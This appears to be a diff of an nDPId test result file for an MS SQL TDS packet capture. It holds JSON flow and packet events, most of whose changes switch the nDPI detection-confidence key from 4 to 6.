00965{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":425,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":425,"pkt_l4_len":391,"thread_ts_msec":1259762477536,"pkt":"ABI\/\/61OABI\/\/6gdCABFAAGb5atAAIAGj9IKb29vCgAAAR5hBZmoWkXE76JT4VAY\/ohFLgAAAwkBcwAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAEABwAF8AUwBlAHQAQgBvAGcAdQBzAFMAYQBtAHAAbABlAAAAD0AAQgBvAGcAdQBzAEQAZQB0AGEAaQBsAHMASQBEAAAmCAhFIwEAAAAAAA5AAEIAbwBnAHUAcwBTAHQAYQB0AHUAcwBJAEQAACYICAUAAAAAAAAAC0AAUgBlAHMAdQBsAHQAQwBvAGQAZQAA5wIACQTQADT\/\/wpAAFIAZQBzAHUAbAB0AE0AcwBnAADnAgAJBNAANP\/\/CkAARQByAHIAbwByAEMAbwBkAGUAAOcCAAkE0AA0\/\/8JQABFAHIAcgBvAHIATQBzAGcAAOcCAAkE0AA0\/\/8YQABFAHgAYQBtAHAAbABlAEIAbwBnAHUAcwBHAGUAbgBlAHIAYQB0AGUAZABJAEQAAOcCAAkE0AA0\/\/8MQABFAHgAYQBtAHAAbABlAFQAeQBwAGUAACYEBAEAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1259762477536,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1259762482456,"pkt":"ABI\/\/61OABI\/\/6gdCABFAACA6VZAAIAGjUIKb29vCgAAASK4BZmoWq7z77DJrlAY\/kP\/5gAAAwkAWAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAGwBwAF8ARwBlAHQATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAFIAbwB3AEMAbwB1AG4AdAAAAA=="} 
-00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762482456,"flow_last_seen":1259762482456,"flow_idle_time":7580000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":1,"thread_ts_msec":1259762482456,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":8888,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":35,"packets-processed":34,"total-skipped-flows":0,"total-l4-payload-len":13137,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":8,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1278068444584} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00748{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1278068444584,"pkt":"ADAFzckRADAFzck9CABFAAECT7tAAIAGJlwKb29vCgAAAScPBZlFt6JP51MRDlAY+rgBzgAAAwEA2gAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAzIhEAVUR3ZoiZqrvM3e7\/AAAfAADnAAAJBAABMgAAAACnJAAJBAABMiQAQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqAAAmBAQBAAAAAAAmCAgtAAAAAAAAAAAApQwADAABI0VniavN7\/7cupgAACYEBGwAAAA="} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444584,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1278068444614,"pkt":"ADAFzckRADAFzck9CABFAADvT85AAIAGJlwKb29vCgAAAStnBZlFt6Pw51OjJ1AY\/N33oQAAAwkAxwAAAQAkAHAAcgBvAGMAXwBHAGUAdABNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAUwBhAG0AcABsAGUATQBlAHQAYQBEAGEAdABhAAAAAAAkEBAAESIzRFVmd4iZqrvM3e7\/AAAfAADnCgAJBAABMgoAQgBvAGcAdQBzAAAAHwAAJgQEAQAAAAAAJggILQAAAAAAAAAAAKUcABwAASNFZ4mrze\/ty6mHZUMhASNFZ4mrze\/ty6mHZQAAJgQEEgAAAA=="} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444614,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00820{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":322,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":322,"pkt_l4_len":288,"thread_ts_msec":1278068444650,"pkt":"ADAFzckRADAFzck9CABFAAE0T9pAAIAGJgsKb29vCgAAAVbOBZn+D2d0K1+fyFAY+5tcOQAAAwkBDAAAAQAXAHAAcgBvAGMAXwBGAGUAdABjAGgATQB5AEUAeABhAG0AcABsAGUARABhAHQAYQAAAAAAJBAQASNFZ4mrze8BI0VniavN7wAA5wAACQQAATIAAAAA5woACQQAATIKAEIATwBHAFUAUwAAAGgBAQAAAG8ICP7\/\/\/8AAAAAAAAmBAQAAAAAAAAmBAQAAAAAAAAmBAAAACQQAAAAaAEAAAAmAQEAAAClHAAcAAEjRWeJq83vASNFZ4mrze8BI0VniavN7wEjRWcAACYEAAAAJgEBAQAAJgQEAABQAAAAJggILQAAAAAAAAAAACYBAQEAAGgBAQAAAOcCAAkEAAEy\/\/8AASYBAA=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":37,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444650,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00891{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1278068444666,"pkt":"ADAFzckRADAFzck9CABFAAFoT95AAIAGJdMKb29vCgAAAYI1BZl4aO73Gv+xN1AY\/dgFJQAAAwkBQAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAHQBkAGIAbwAuAHAAcgBvAGMAXwBHAGUAdABNAHkAUwBhAG0AcABsAGUARABhAHQAYQBJAHQAZQBtAHMAAAANQABTAGEAbQBwAGwAZQBJAHQAZQBtAEkAZAAAJBAQZhrDThSiU0infucGD\/\/\/BwdAAEQAYQB0AGEASQBkAADnAgAJBBAAAP\/\/DUAARABhAHQAYQBJAHQAZQBtAFQAeQBwAGUAACQQEJtFubyog2RFsdPp4ZhHj04IQABUAGEAYgBsAGUASQBkAADnAgAJBBAAAP\/\/DUAATQBhAHgARgBlAHQAYwBoAFMAaQB6AGUAACYEBGQAAAASQABTAG8AbQBlAE8AdABoAGUAcgBTAGEAbQBwAGwAZQBJAGQAACYEBAAAAAA="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7580000,"flow_min_l4_payload_len":17,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7580000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278068444666,"flow_last_seen":1278068444666,"flow_idle_time":7580000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":33333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444614,"flow_last_seen":1278068444614,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":11111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7580000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1259762400716,"flow_last_seen":1259762407935,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":438,"flow_tot_l4_payload_len":2137,"flow_avg_l4_payload_len":125,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1259762477536,"flow_last_seen":1259762477536,"flow_idle_time":7580000,"flow_min_l4_payload_len":371,"flow_max_l4_payload_len":371,"flow_tot_l4_payload_len":371,"flow_avg_l4_payload_len":371,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":7777,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444650,"flow_last_seen":1278068444650,"flow_idle_time":7580000,"flow_min_l4_payload_len":268,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":268,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":22222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":38,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278068444584,"flow_last_seen":1278068444584,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1278068444666,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":9999,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} 
